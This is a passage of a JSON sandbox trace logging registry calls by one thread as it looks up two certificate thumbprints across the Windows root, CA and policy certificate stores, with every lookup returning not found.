"thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1793 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000570" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" } ], "repeated": 0, "id": 1794 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1795 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1796 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1797 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0b9e956", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1798 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" } ], "repeated": 0, "id": 1799 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1800 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1801 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1802 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0b9e9e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1803 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000574" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" } ], "repeated": 0, "id": 1804 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1805 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1806 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1807 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000578" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" } ], "repeated": 0, "id": 1808 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1809 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1810 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1811 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0b9e956", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1812 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" } ], "repeated": 0, "id": 1813 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1814 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1815 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1816 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0b9e9e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1817 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000057c" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" } ], "repeated": 0, "id": 1818 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1819 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "108FBF794E18EC5347A414E4370CC4506C297AB2" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2" } ], "repeated": 0, "id": 1820 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1821 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000056c" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates" } ], "repeated": 0, "id": 1822 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1823 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1824 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1825 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000570" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates" } ], "repeated": 0, "id": 1826 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1827 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1828 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1829 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0b9e956", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1830 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates" } ], "repeated": 0, "id": 1831 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1832 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1833 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1834 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0b9e9e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1835 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000574" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates" } ], "repeated": 0, "id": 1836 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1837 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1838 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1839 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000578" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" } ], "repeated": 0, "id": 1840 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000564" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1841 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1842 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1843 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacd4d", "parentcaller": "0x7ffee0b9e956", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x0003001f", "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" }, { "name": "Handle", "value": "0x00000564" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1844 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000564" }, { "name": "SubKey", "value": "Certificates" }, { "name": "Handle", "value": "0x00000568" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" } ], "repeated": 0, "id": 1845 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ead7", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000568" }, { "name": "ValueName", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1846 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9ecc8", "parentcaller": "0x7ffee0b9ebb9", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000568" }, { "name": "SubKey", "value": "932BED339AA69212C89375B79304B475490B89A0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0" } ], "repeated": 0, "id": 1847 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0b9eb33", "parentcaller": "0x7ffee0b9e903", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000568" } ], "repeated": 0, "id": 1848 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0b9e9e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000564" } ], "repeated": 0, "id": 1849 }, { "timestamp": "2025-11-20 10:58:35,391", "thread_id": "1596", "caller": "0x7ffee0bacca2", "parentcaller": "0x7ffee0b9eaa9", 